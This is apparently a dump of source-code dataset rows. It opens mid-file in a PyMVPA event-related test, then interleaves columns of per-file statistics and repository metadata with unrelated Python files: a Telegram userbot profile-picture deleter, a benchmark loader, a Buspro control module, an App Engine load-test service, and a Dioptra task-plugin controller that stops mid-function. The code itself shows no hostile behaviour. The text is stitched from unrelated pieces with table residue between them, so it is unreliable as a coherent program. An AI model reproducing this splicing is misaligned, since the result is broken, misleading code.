np.repeat(np.arange(blocklength), nfeatures))
# that should also be the temporal feature offset
assert_array_equal(erds.samples[0], erds.fa.event_offsetidx)
assert_array_equal(erds.sa.event_onsetidx, np.arange(0,71,5))
# finally we should see two mappers
assert_equal(len(erds.a.mapper), 2)
assert_true(isinstance(erds.a.mapper[0], BoxcarMapper))
assert_true(isinstance(erds.a.mapper[1], FlattenMapper))
# check alternative event mapper
# this one does temporal compression by averaging
erds_compress = eventrelated_dataset(
ds, evs, event_mapper=FxMapper('features', np.mean))
assert_equal(len(erds), len(erds_compress))
assert_array_equal(erds_compress.samples[:,0], np.arange(2,73,5))
#
# now check the same dataset with event discretization
tr = 2.5
ds.sa['time'] = np.arange(nchunks * ntargets * blocklength) * tr
evs = [{'onset': 4.9, 'duration': 6.2}]
# doesn't work without conversion
assert_raises(ValueError, eventrelated_dataset, ds, evs)
erds = eventrelated_dataset(ds, evs, time_attr='time')
assert_equal(len(erds), 1)
assert_array_equal(erds.samples[0], np.repeat(np.arange(1,5), nfeatures))
assert_array_equal(erds.sa.orig_onset, [evs[0]['onset']])
assert_array_equal(erds.sa.orig_duration, [evs[0]['duration']])
assert_array_almost_equal(erds.sa.orig_offset, [2.4])
assert_array_equal(erds.sa.time, [np.arange(2.5, 11, 2.5)])
# now with closest match
erds = eventrelated_dataset(ds, evs, time_attr='time', match='closest')
expected_nsamples = 3
assert_equal(len(erds), 1)
assert_array_equal(erds.samples[0],
np.repeat(np.arange(2,2+expected_nsamples),
nfeatures))
assert_array_equal(erds.sa.orig_onset, [evs[0]['onset']])
assert_array_equal(erds.sa.orig_duration, [evs[0]['duration']])
assert_array_almost_equal(erds.sa.orig_offset, [-0.1])
assert_array_equal(erds.sa.time, [np.arange(5.0, 11, 2.5)])
# now test the way back
results = np.arange(erds.nfeatures)
assert_array_equal(erds.a.mapper.reverse1(results),
results.reshape(expected_nsamples, nfeatures))
# what about multiple results?
nresults = 5
results = dataset_wizard([results] * nresults)
# and let's have an attribute to make it more difficult
results.sa['myattr'] = np.arange(5)
rds = erds.a.mapper.reverse(results)
assert_array_equal(rds,
results.samples.reshape(nresults * expected_nsamples,
nfeatures))
assert_array_equal(rds.sa.myattr, np.repeat(results.sa.myattr,
expected_nsamples))
evs = [dict(onset=12, duration=2), dict(onset=70, duration=3)]
evds = extract_boxcar_event_samples(ds, evs)
# it goes for the max of all durations
assert_equal(evds.shape, (len(evs), 3 * ds.nfeatures))
# override duration
evds = extract_boxcar_event_samples(ds, evs, event_duration=1)
assert_equal(evds.shape, (len(evs), 1 * ds.nfeatures))
assert_equal(np.unique(evds.samples[1]), 70)
# override onset
evds = extract_boxcar_event_samples(ds, evs, event_offset=2)
assert_equal(evds.shape, (len(evs), 3 * ds.nfeatures))
assert_equal(np.unique(evds.samples[1,:10]), 72)
# override both
evds = extract_boxcar_event_samples(ds, evs, event_offset=-2,
event_duration=1)
assert_equal(evds.shape, (len(evs), 1 * ds.nfeatures))
assert_equal(np.unique(evds.samples[1]), 68)
def test_hrf_modeling():
skip_if_no_external('nibabel')
skip_if_no_external('nipy') # ATM relies on NiPy's GLM implementation
ds = load_example_fmri_dataset('25mm', literal=True)
# TODO: simulate short dataset with known properties and use it
# for testing
events = find_events(targets=ds.sa.targets, chunks=ds.sa.chunks)
tr = ds.a.imghdr['pixdim'][4]
for ev in events:
for a in ('onset', 'duration'):
ev[a] = ev[a] * tr
evds = eventrelated_dataset(ds, events, time_attr='time_coords',
condition_attr='targets',
design_kwargs=dict(drift_model='blank'),
glmfit_kwargs=dict(model='ols'),
model='hrf')
# same voxels
assert_equal(ds.nfeatures, evds.nfeatures)
assert_array_equal(ds.fa.voxel_indices, evds.fa.voxel_indices)
# one sample for each condition, plus constant
assert_equal(sorted(ds.sa['targets'].unique), sorted(evds.sa.targets))
assert_equal(evds.a.add_regs.sa.regressor_names[0], 'constant')
# with centered data
zscore(ds)
evds_demean = eventrelated_dataset(ds, events, time_attr='time_coords',
condition_attr='targets',
design_kwargs=dict(drift_model='blank'),
glmfit_kwargs=dict(model='ols'),
model='hrf')
# after demeaning the constant should consume a lot less
assert(evds.a.add_regs[0].samples.mean()
> evds_demean.a.add_regs[0].samples.mean())
# from eyeballing the sensitivity example -- would be better to test this on
# the tutorial data
assert(evds_demean[evds.sa.targets == 'shoe'].samples.max() \
> evds_demean[evds.sa.targets == 'bottle'].samples.max())
# HRF models
assert('regressors' in evds.sa)
assert('regressors' in evds.a.add_regs.sa)
assert_equal(evds.sa.regressors.shape[1], len(ds))
# custom regressors
evds_regrs = eventrelated_dataset(ds, events, time_attr='time_coords',
condition_attr='targets',
regr_attrs=['time_indices'],
design_kwargs=dict(drift_model='blank'),
glmfit_kwargs=dict(model='ols'),
model='hrf')
# verify that nothing screwed up time_coords
assert_equal(ds.sa.time_coords[0], 0)
assert_equal(len(evds_regrs), len(evds))
# one more output sample in .a.add_regs
assert_equal(len(evds_regrs.a.add_regs) - 1, len(evds.a.add_regs))
# comes last before constant
assert_equal('time_indices', evds_regrs.a.add_regs.sa.regressor_names[-2])
# order of main regressors is unchanged
assert_array_equal(evds.sa.targets, evds_regrs.sa.targets)
# custom regressors from external sources
evds_regrs = eventrelated_dataset(ds, events, time_attr='time_coords',
condition_attr='targets',
regr_attrs=['time_coords'],
design_kwargs=dict(drift_model='blank',
add_regs=np.linspace(1, -1, len(ds))[None].T,
add_reg_names=['negative_trend']),
glmfit_kwargs=dict(model='ols'),
model='hrf')
assert_equal(len(evds_regrs), len(evds))
# But we got one more in additional regressors
assert_equal(len(evds_regrs.a.add_regs) - 2, len(evds.a.add_regs))
# comes last before constant
assert_array_equal(['negative_trend', 'time_coords', 'constant'],
evds_regrs.a.add_regs.sa.regressor_names)
# order is otherwise unchanged
assert_array_equal(evds.sa.targets, evds_regrs.sa.targets)
# HRF models with estimating per each chunk
assert_equal(ds.sa.time_coords[0], 0)
evds_regrs = eventrelated_dataset(ds, events, time_attr='time_coords',
condition_attr=['targets', 'chunks'],
regr_attrs=['time_indices'],
design_kwargs=dict(drift_model='blank'),
glmfit_kwargs=dict(model='ols'),
model='hrf')
assert_true('add_regs' in evds_regrs.a)
assert_true('time_indices' in evds_regrs.a.add_regs.sa.regressor_names)
assert_equal(len(ds.UC) * len(ds.UT), len(evds_regrs))
assert_equal(len(evds_regrs.UC) * len(evds_regrs.UT), len(evds_regrs))
from mvpa2.mappers.fx import mean_group_sample
evds_regrs_meaned = mean_group_sample(['targets'])(evds_regrs)
assert_array_equal(evds_regrs_meaned.T, evds.T) # targets should be the same
#corr = np.corrcoef(np.vstack((evds.samples, evds_regrs_meaned)))
#import pydb; pydb.debugger()
#pass
#i = 1
| 48.45
| 96
| 0.626888
| 1,369
| 10,659
| 4.700511
| 0.211833
| 0.047863
| 0.049728
| 0.040404
| 0.44289
| 0.404196
| 0.366589
| 0.33986
| 0.271329
| 0.254701
| 0
| 0.014513
| 0.250117
| 10,659
| 219
| 97
| 48.671233
| 0.790567
| 0.164837
| 0
| 0.275641
| 0
| 0
| 0.052252
| 0
| 0
| 0
| 0
| 0.004566
| 0.378205
| 1
| 0.012821
| false
| 0
| 0.057692
| 0
| 0.070513
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
7148d1a57a15a29836e2ab0aae7b7bc5dc398f57
| 1,174
|
py
|
Python
|
userbot/plugins/delfp.py
|
aksr-aashish/FIREXUSERBOT
|
dff0b7bf028cb27779626ce523402346cc990402
|
[
"MIT"
] | null | null | null |
userbot/plugins/delfp.py
|
aksr-aashish/FIREXUSERBOT
|
dff0b7bf028cb27779626ce523402346cc990402
|
[
"MIT"
] | 1
|
2022-01-09T11:35:06.000Z
|
2022-01-09T11:35:06.000Z
|
userbot/plugins/delfp.py
|
aksr-aashish/FIREXUSERBOT
|
dff0b7bf028cb27779626ce523402346cc990402
|
[
"MIT"
] | null | null | null |
from telethon.tl.functions.photos import DeletePhotosRequest, GetUserPhotosRequest
from telethon.tl.types import InputPhoto
from userbot.cmdhelp import CmdHelp
from userbot.utils import admin_cmd, edit_or_reply, sudo_cmd
CmdHelp("delfp").add_command("delpfp", None, "delete ur currnt profile picture").add()
@borg.on(admin_cmd(pattern="delpfp ?(.*)"))
@borg.on(sudo_cmd(pattern="delpfp ?(.*)", allow_sudo=True))
async def remove_profilepic(delpfp):
"""For .delpfp command, delete your current profile picture in Telegram."""
group = delpfp.text[8:]
if group == "all":
lim = 0
elif group.isdigit():
lim = int(group)
else:
lim = 1
pfplist = await delpfp.client(
GetUserPhotosRequest(user_id=delpfp.from_id, offset=0, max_id=0, limit=lim)
)
input_photos = [InputPhoto(
id=sep.id,
access_hash=sep.access_hash,
file_reference=sep.file_reference,
) for sep in pfplist.photos]
await delpfp.client(DeletePhotosRequest(id=input_photos))
await edit_or_reply(
delpfp, f"`Successfully deleted {len(input_photos)} profile picture(s).`"
)
| 34.529412
| 86
| 0.67632
| 149
| 1,174
| 5.187919
| 0.496644
| 0.054334
| 0.036223
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.005371
| 0.206985
| 1,174
| 33
| 87
| 35.575758
| 0.824919
| 0
| 0
| 0
| 0
| 0
| 0.120109
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.148148
| 0
| 0.148148
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
7149245bb6b3dda015cca0a397d867fb3542c00d
| 1,308
|
py
|
Python
|
amlb/benchmarks/file.py
|
pplonski/automlbenchmark
|
f49ddfa2583643173296ed8ab45a8c14c62a6987
|
[
"MIT"
] | 282
|
2018-09-19T09:45:46.000Z
|
2022-03-30T04:05:51.000Z
|
amlb/benchmarks/file.py
|
pplonski/automlbenchmark
|
f49ddfa2583643173296ed8ab45a8c14c62a6987
|
[
"MIT"
] | 267
|
2018-11-02T11:43:11.000Z
|
2022-03-31T08:58:16.000Z
|
amlb/benchmarks/file.py
|
pplonski/automlbenchmark
|
f49ddfa2583643173296ed8ab45a8c14c62a6987
|
[
"MIT"
] | 104
|
2018-10-17T19:32:36.000Z
|
2022-03-19T22:47:59.000Z
|
import logging
import os
from typing import List, Tuple, Optional
from amlb.utils import config_load, Namespace
log = logging.getLogger(__name__)
def _find_local_benchmark_definition(name: str, benchmark_definition_dirs: List[str]) -> str:
# 'name' should be either a full path to the benchmark,
# or a filename (without extension) in the benchmark directory.
if os.path.exists(name):
return name
for bd in benchmark_definition_dirs:
bf = os.path.join(bd, f"{name}.yaml")
if os.path.exists(bf):
# We don't account for duplicate definitions (yet).
return bf
# should we support s3 and check for s3 path before raising error?
raise ValueError(f"Incorrect benchmark name or path `{name}`, name not available in {benchmark_definition_dirs}.")
def load_file_benchmark(name: str, benchmark_definition_dirs: List[str]) -> Tuple[str, Optional[str], List[Namespace]]:
""" Loads benchmark from a local file. """
benchmark_file = _find_local_benchmark_definition(name, benchmark_definition_dirs)
log.info("Loading benchmark definitions from %s.", benchmark_file)
tasks = config_load(benchmark_file)
benchmark_name, _ = os.path.splitext(os.path.basename(benchmark_file))
return benchmark_name, benchmark_file, tasks
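# Usage sketch (illustrative only): how load_file_benchmark might be called. The
# directory name and the yaml body below are assumptions for illustration; a real
# definition would follow the project's benchmark schema.
import os
from pathlib import Path
os.makedirs("benchmark_defs", exist_ok=True)
Path("benchmark_defs/demo.yaml").write_text("- name: iris\n  openml_task_id: 59\n")
demo_name, demo_file, demo_tasks = load_file_benchmark("demo", ["benchmark_defs"])
log.info("Loaded benchmark %s (%d task(s)) from %s", demo_name, len(demo_tasks), demo_file)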
| 39.636364
| 119
| 0.727829
| 180
| 1,308
| 5.1
| 0.405556
| 0.14488
| 0.125272
| 0.061002
| 0.14597
| 0.08061
| 0.08061
| 0
| 0
| 0
| 0
| 0.001867
| 0.181193
| 1,308
| 32
| 120
| 40.875
| 0.855275
| 0.204128
| 0
| 0
| 0
| 0
| 0.13773
| 0.027158
| 0
| 0
| 0
| 0
| 0
| 1
| 0.105263
| false
| 0
| 0.210526
| 0
| 0.473684
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
714957e1bb0b1384b108ed8e7921b1c771c5effe
| 4,815
|
py
|
Python
|
pybuspro/devices/control.py
|
eyesoft/pybuspro
|
9a178117be2db40ef1399cc60afdc18e251682bc
|
[
"MIT"
] | 2
|
2019-03-15T03:47:10.000Z
|
2019-10-30T15:34:09.000Z
|
pybuspro/devices/control.py
|
eyesoft/pybuspro
|
9a178117be2db40ef1399cc60afdc18e251682bc
|
[
"MIT"
] | null | null | null |
pybuspro/devices/control.py
|
eyesoft/pybuspro
|
9a178117be2db40ef1399cc60afdc18e251682bc
|
[
"MIT"
] | 4
|
2019-01-12T17:50:24.000Z
|
2020-01-12T16:56:24.000Z
|
from ..core.telegram import Telegram
from ..helpers.enums import OperateCode
class _Control:
def __init__(self, buspro):
self._buspro = buspro
self.subnet_id = None
self.device_id = None
@staticmethod
def build_telegram_from_control(control):
if control is None:
return None
if type(control) == _SingleChannelControl:
operate_code = OperateCode.SingleChannelControl
payload = [control.channel_number, control.channel_level, control.running_time_minutes,
control.running_time_seconds]
elif type(control) == _SceneControl:
operate_code = OperateCode.SceneControl
payload = [control.area_number, control.scene_number]
elif type(control) == _ReadStatusOfChannels:
operate_code = OperateCode.ReadStatusOfChannels
payload = []
elif type(control) == _GenericControl:
operate_code = control.operate_code
payload = control.payload
elif type(control) == _UniversalSwitch:
operate_code = OperateCode.UniversalSwitchControl
payload = [control.switch_number, control.switch_status.value]
elif type(control) == _ReadStatusOfUniversalSwitch:
operate_code = OperateCode.ReadStatusOfUniversalSwitch
payload = [control.switch_number]
elif type(control) == _ReadSensorStatus:
operate_code = OperateCode.ReadSensorStatus
payload = []
elif type(control) == _ReadSensorsInOneStatus:
operate_code = OperateCode.ReadSensorsInOneStatus
payload = []
elif type(control) == _ReadFloorHeatingStatus:
operate_code = OperateCode.ReadFloorHeatingStatus
payload = []
elif type(control) == _ReadDryContactStatus:
operate_code = OperateCode.ReadDryContactStatus
payload = [1, control.switch_number]
elif type(control) == _ControlFloorHeatingStatus:
operate_code = OperateCode.ControlFloorHeatingStatus
payload = [control.temperature_type, control.status, control.mode, control.normal_temperature,
control.day_temperature, control.night_temperature, control.away_temperature]
else:
return None
telegram = Telegram()
telegram.target_address = (control.subnet_id, control.device_id)
telegram.operate_code = operate_code
telegram.payload = payload
return telegram
@property
def telegram(self):
return self.build_telegram_from_control(self)
async def send(self):
telegram = self.telegram
# if telegram.target_address[1] == 100:
# print("==== {}".format(str(telegram)))
await self._buspro.network_interface.send_telegram(telegram)
class _GenericControl(_Control):
def __init__(self, buspro):
super().__init__(buspro)
self.payload = None
self.operate_code = None
class _SingleChannelControl(_Control):
def __init__(self, buspro):
super().__init__(buspro)
self.channel_number = None
self.channel_level = None
self.running_time_minutes = None
self.running_time_seconds = None
class _SceneControl(_Control):
def __init__(self, buspro):
super().__init__(buspro)
self.area_number = None
self.scene_number = None
class _ReadStatusOfChannels(_Control):
def __init__(self, buspro):
super().__init__(buspro)
# no more properties
class _UniversalSwitch(_Control):
def __init__(self, buspro):
super().__init__(buspro)
self.switch_number = None
self.switch_status = None
class _ReadStatusOfUniversalSwitch(_Control):
def __init__(self, buspro):
super().__init__(buspro)
self.switch_number = None
class _ReadSensorStatus(_Control):
def __init__(self, buspro):
super().__init__(buspro)
# no more properties
class _ReadSensorsInOneStatus(_Control):
def __init__(self, buspro):
super().__init__(buspro)
# no more properties
class _ReadFloorHeatingStatus(_Control):
def __init__(self, buspro):
super().__init__(buspro)
# no more properties
class _ControlFloorHeatingStatus(_Control):
def __init__(self, buspro):
super().__init__(buspro)
self.temperature_type = None
self.status = None
self.mode = None
self.normal_temperature = None
self.day_temperature = None
self.night_temperature = None
self.away_temperature = None
class _ReadDryContactStatus(_Control):
def __init__(self, buspro):
super().__init__(buspro)
self.switch_number = None
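# Usage sketch (illustrative only): a control object can be turned into a telegram
# without any network traffic. Passing buspro=None is an assumption that holds only
# because the base class merely stores the reference and .telegram never uses it;
# the subnet/device/channel numbers are made-up demo values.
demo_ctl = _SingleChannelControl(None)
demo_ctl.subnet_id, demo_ctl.device_id = 1, 74
demo_ctl.channel_number = 2
demo_ctl.channel_level = 100
demo_ctl.running_time_minutes = 0
demo_ctl.running_time_seconds = 1
demo_telegram = demo_ctl.telegram
print(demo_telegram.target_address, demo_telegram.operate_code, demo_telegram.payload)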
| 28.660714
| 106
| 0.655867
| 452
| 4,815
| 6.564159
| 0.165929
| 0.055612
| 0.056623
| 0.072801
| 0.229525
| 0.221436
| 0.198517
| 0.198517
| 0.198517
| 0.140546
| 0
| 0.001409
| 0.263136
| 4,815
| 167
| 107
| 28.832335
| 0.834837
| 0.032399
| 0
| 0.288288
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.126126
| false
| 0
| 0.018018
| 0.009009
| 0.288288
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
7149b8c5cf18fd7bdd1bfdc804b0918d755edaae
| 5,961
|
py
|
Python
|
appengine/chrome_infra_console_loadtest/main.py
|
eunchong/infra
|
ce3728559112bfb3e8b32137eada517aec6d22f9
|
[
"BSD-3-Clause"
] | null | null | null |
appengine/chrome_infra_console_loadtest/main.py
|
eunchong/infra
|
ce3728559112bfb3e8b32137eada517aec6d22f9
|
[
"BSD-3-Clause"
] | null | null | null |
appengine/chrome_infra_console_loadtest/main.py
|
eunchong/infra
|
ce3728559112bfb3e8b32137eada517aec6d22f9
|
[
"BSD-3-Clause"
] | null | null | null |
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import logging
import endpoints
import random
import webapp2
from apiclient import discovery
from google.appengine.ext import ndb
from oauth2client.client import GoogleCredentials
from protorpc import messages
from protorpc import message_types
from protorpc import remote
from components import auth
CONFIG_DATASTORE_KEY = "CONFIG_DATASTORE_KEY"
API_NAME = 'consoleapp'
API_VERSION = 'v1'
DISCOVERY_URL = '%s/_ah/api/discovery/v1/apis/{api}/{apiVersion}/rest'
class FieldParamsModel(ndb.Model):
field_key = ndb.StringProperty()
values = ndb.StringProperty(repeated=True)
class MetricModel(ndb.Model):
name = ndb.StringProperty(default="")
minimum = ndb.FloatProperty(default=0)
maximum = ndb.FloatProperty(default=100)
class ParamsModel(ndb.Model):
time = ndb.FloatProperty(default=10)
freq = ndb.FloatProperty(default=1)
url = ndb.StringProperty()
params = ndb.LocalStructuredProperty(FieldParamsModel, repeated=True)
metrics = ndb.LocalStructuredProperty(MetricModel, repeated=True)
class Field(messages.Message):
key = messages.StringField(1)
value = messages.StringField(2)
class Point(messages.Message):
time = messages.FloatField(1)
value = messages.FloatField(2)
class FieldParams(messages.Message):
field_key = messages.StringField(1)
values = messages.StringField(2, repeated=True)
class Metric(messages.Message):
name = messages.StringField(1)
minimum = messages.FloatField(2)
maximum = messages.FloatField(3)
class Params(messages.Message):
time = messages.FloatField(1)
freq = messages.FloatField(2)
url = messages.StringField(3)
params = messages.MessageField(FieldParams, 4, repeated=True)
metrics = messages.MessageField(Metric, 5, repeated=True)
class TimeSeries(messages.Message):
points = messages.MessageField(Point, 1, repeated=True)
fields = messages.MessageField(Field, 2, repeated=True)
metric = messages.StringField(3)
class DataPacket(messages.Message):
timeseries = messages.MessageField(TimeSeries, 1, repeated=True)
@auth.endpoints_api(name='consoleapp', version='v1')
class LoadTestApi(remote.Service):
"""A testing endpoint that receives timeseries data."""
@auth.endpoints_method(DataPacket, message_types.VoidMessage,
name='timeseries.update')
@auth.require(lambda: auth.is_group_member('metric-generators'))
def timeseries_update(self, request):
logging.debug('Datapacket length is %d', len(request.timeseries))
return message_types.VoidMessage()
@auth.endpoints_api(name='ui', version='v1')
class UIApi(remote.Service):
"""API for the loadtest configuration UI."""
@auth.endpoints_method(message_types.VoidMessage, Params,
name='ui.get')
@auth.require(lambda: auth.is_group_member('metric-generators'))
def UI_get(self, _request):
data = ParamsModel.get_or_insert(CONFIG_DATASTORE_KEY)
params = [FieldParams(field_key=field.field_key, values=field.values)
for field in data.params]
metrics = [Metric(name=metric.name,
minimum=metric.minimum,
maximum=metric.maximum)
for metric in data.metrics]
return Params(time=data.time, freq=data.freq, url=data.url, params=params,
metrics=metrics)
@auth.endpoints_method(Params, message_types.VoidMessage,
name='ui.set')
@auth.require(lambda: auth.is_group_member('metric-generators'))
def UI_set(self, request):
logging.debug('Got %s', request)
data = ParamsModel.get_or_insert(CONFIG_DATASTORE_KEY)
data.time = request.time
data.freq = request.freq
data.url = request.url
data.params = [FieldParamsModel(field_key=field.field_key,
values=field.values)
for field in request.params]
data.metrics = [MetricModel(name=metric.name,
minimum=metric.minimum,
maximum=metric.maximum)
for metric in request.metrics]
data.put()
return message_types.VoidMessage()
def field_generator(dataparams, index, fields):
if index == len(dataparams):
return [fields]
else:
key = dataparams[index].field_key
return sum((field_generator(
dataparams, index+1, fields+[{'key': key, 'value': value}])
for value in dataparams[index].values), [])
class CronHandler(webapp2.RequestHandler):
def get(self):
data = ParamsModel.get_or_insert(CONFIG_DATASTORE_KEY)
metric_ranges = {}
for metric in data.metrics:
metric_ranges[metric.name] = (metric.minimum,metric.maximum)
datapacket = {'timeseries': []}
logging.debug('There are %d metrics', len(metric_ranges))
fieldlist = field_generator(data.params, 0, [])
for metric in metric_ranges:
for fields in fieldlist:
points = []
for x in xrange(0, int(data.time), int(data.freq)):
points.append({'time': x,
'value': random.uniform(*metric_ranges[metric])})
timeseries = {'points': points,
'fields': fields,
'metric': metric}
datapacket['timeseries'].append(timeseries)
logging.info('Send data to %s', data.url)
discovery_url = DISCOVERY_URL % data.url
credentials = GoogleCredentials.get_application_default()
service = discovery.build(API_NAME, API_VERSION,
discoveryServiceUrl=discovery_url,
credentials=credentials)
_response = service.timeseries().update(body=datapacket).execute()
backend_handlers = [
('/cron', CronHandler)
]
WEBAPP = webapp2.WSGIApplication(backend_handlers, debug=True)
APPLICATION = endpoints.api_server([LoadTestApi, UIApi])
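# Usage sketch (illustrative only): field_generator expands every combination of the
# configured field values. The namedtuple below is a stand-in for the FieldParamsModel
# entities used above; the concrete keys and values are assumptions for illustration.
from collections import namedtuple
FakeFieldParams = namedtuple("FakeFieldParams", ["field_key", "values"])
demo_fields = [FakeFieldParams("master", ["m1", "m2"]), FakeFieldParams("builder", ["b1"])]
print(field_generator(demo_fields, 0, []))
# -> [[{'key': 'master', 'value': 'm1'}, {'key': 'builder', 'value': 'b1'}],
#     [{'key': 'master', 'value': 'm2'}, {'key': 'builder', 'value': 'b1'}]]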
| 33.301676
| 78
| 0.690824
| 687
| 5,961
| 5.896652
| 0.24163
| 0.02666
| 0.022217
| 0.015552
| 0.158973
| 0.150827
| 0.132066
| 0.132066
| 0.121205
| 0.096026
| 0
| 0.008384
| 0.199631
| 5,961
| 178
| 79
| 33.488764
| 0.840704
| 0.0411
| 0
| 0.105263
| 0
| 0
| 0.053305
| 0.009118
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037594
| false
| 0
| 0.082707
| 0
| 0.466165
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
7149cd13d14ac2cce8176e2e198709907cc8c456
| 9,523
|
py
|
Python
|
src/mitre/securingai/restapi/task_plugin/controller.py
|
usnistgov/dioptra
|
08a08e96c27787915bafc75a483431333e2c70ca
|
[
"CC-BY-4.0"
] | 14
|
2021-06-17T15:16:12.000Z
|
2021-11-08T10:25:37.000Z
|
src/mitre/securingai/restapi/task_plugin/controller.py
|
usnistgov/dioptra
|
08a08e96c27787915bafc75a483431333e2c70ca
|
[
"CC-BY-4.0"
] | 7
|
2021-09-20T20:20:26.000Z
|
2022-03-30T13:17:43.000Z
|
src/mitre/securingai/restapi/task_plugin/controller.py
|
usnistgov/dioptra
|
08a08e96c27787915bafc75a483431333e2c70ca
|
[
"CC-BY-4.0"
] | 4
|
2021-06-29T16:52:42.000Z
|
2022-01-21T16:56:45.000Z
|
# This Software (Dioptra) is being made available as a public service by the
# National Institute of Standards and Technology (NIST), an Agency of the United
# States Department of Commerce. This software was developed in part by employees of
# NIST and in part by NIST contractors. Copyright in portions of this software that
# were developed by NIST contractors has been licensed or assigned to NIST. Pursuant
# to Title 17 United States Code Section 105, works of NIST employees are not
# subject to copyright protection in the United States. However, NIST may hold
# international copyright in software created by its employees and domestic
# copyright (or licensing rights) in portions of software that were assigned or
# licensed to NIST. To the extent that NIST holds copyright in this software, it is
# being made available under the Creative Commons Attribution 4.0 International
# license (CC BY 4.0). The disclaimers of the CC BY 4.0 license apply to all parts
# of the software developed or licensed by NIST.
#
# ACCESS THE FULL CC BY 4.0 LICENSE HERE:
# https://creativecommons.org/licenses/by/4.0/legalcode
"""The module defining the task plugin endpoints."""
import uuid
from typing import List, Optional
import structlog
from flask import current_app, jsonify
from flask.wrappers import Response
from flask_accepts import accepts, responds
from flask_restx import Namespace, Resource
from injector import inject
from structlog.stdlib import BoundLogger
from mitre.securingai.restapi.utils import as_api_parser
from .errors import TaskPluginDoesNotExistError, TaskPluginUploadError
from .model import TaskPlugin, TaskPluginUploadForm, TaskPluginUploadFormData
from .schema import TaskPluginSchema, TaskPluginUploadSchema
from .service import TaskPluginService
LOGGER: BoundLogger = structlog.stdlib.get_logger()
api: Namespace = Namespace(
"TaskPlugin",
description="Task plugin registry operations",
)
@api.route("/")
class TaskPluginResource(Resource):
"""Shows a list of all task plugins, and lets you POST to upload new ones."""
@inject
def __init__(self, *args, task_plugin_service: TaskPluginService, **kwargs) -> None:
self._task_plugin_service = task_plugin_service
super().__init__(*args, **kwargs)
@responds(schema=TaskPluginSchema(many=True), api=api)
def get(self) -> List[TaskPlugin]:
"""Gets a list of all registered task plugins."""
log: BoundLogger = LOGGER.new(
request_id=str(uuid.uuid4()), resource="taskPlugin", request_type="GET"
)
log.info("Request received")
return self._task_plugin_service.get_all(
bucket=current_app.config["AI_PLUGINS_BUCKET"], log=log
)
@api.expect(as_api_parser(api, TaskPluginUploadSchema))
@accepts(TaskPluginUploadSchema, api=api)
@responds(schema=TaskPluginSchema, api=api)
def post(self) -> TaskPlugin:
"""Registers a new task plugin uploaded via the task plugin upload form."""
log: BoundLogger = LOGGER.new(
request_id=str(uuid.uuid4()), resource="taskPlugin", request_type="POST"
)
task_plugin_upload_form: TaskPluginUploadForm = TaskPluginUploadForm()
log.info("Request received")
if not task_plugin_upload_form.validate_on_submit():
log.error("Form validation failed")
raise TaskPluginUploadError
log.info("Form validation successful")
task_plugin_upload_form_data: TaskPluginUploadFormData = (
self._task_plugin_service.extract_data_from_form(
task_plugin_upload_form=task_plugin_upload_form, log=log
)
)
return self._task_plugin_service.create(
task_plugin_upload_form_data=task_plugin_upload_form_data,
bucket=current_app.config["AI_PLUGINS_BUCKET"],
log=log,
)
@api.route("/securingai_builtins")
class TaskPluginBuiltinsCollectionResource(Resource):
"""Shows a list of all builtin task plugins."""
@inject
def __init__(self, *args, task_plugin_service: TaskPluginService, **kwargs) -> None:
self._task_plugin_service = task_plugin_service
super().__init__(*args, **kwargs)
@responds(schema=TaskPluginSchema(many=True), api=api)
def get(self) -> List[TaskPlugin]:
"""Gets a list of all available builtin task plugins."""
log: BoundLogger = LOGGER.new(
request_id=str(uuid.uuid4()),
resource="taskPluginBuiltinCollection",
request_type="GET",
)
log.info("Request received")
return self._task_plugin_service.get_all_in_collection(
collection="securingai_builtins",
bucket=current_app.config["AI_PLUGINS_BUCKET"],
log=log,
)
@api.route("/securingai_builtins/<string:taskPluginName>")
@api.param(
"taskPluginName",
"A unique string identifying a task plugin package within securingai_builtins "
"collection.",
)
class TaskPluginBuiltinCollectionNameResource(Resource):
"""Shows a single builtin task plugin package."""
@inject
def __init__(self, *args, task_plugin_service: TaskPluginService, **kwargs) -> None:
self._task_plugin_service = task_plugin_service
super().__init__(*args, **kwargs)
@responds(schema=TaskPluginSchema, api=api)
def get(self, taskPluginName: str) -> TaskPlugin:
"""Gets a builtin task plugin by its unique name."""
log: BoundLogger = LOGGER.new(
request_id=str(uuid.uuid4()),
resource="taskPluginBuiltinCollectionName",
request_type="GET",
)
log.info("Request received")
task_plugin: Optional[
TaskPlugin
] = self._task_plugin_service.get_by_name_in_collection(
collection="securingai_builtins",
task_plugin_name=taskPluginName,
bucket=current_app.config["AI_PLUGINS_BUCKET"],
log=log,
)
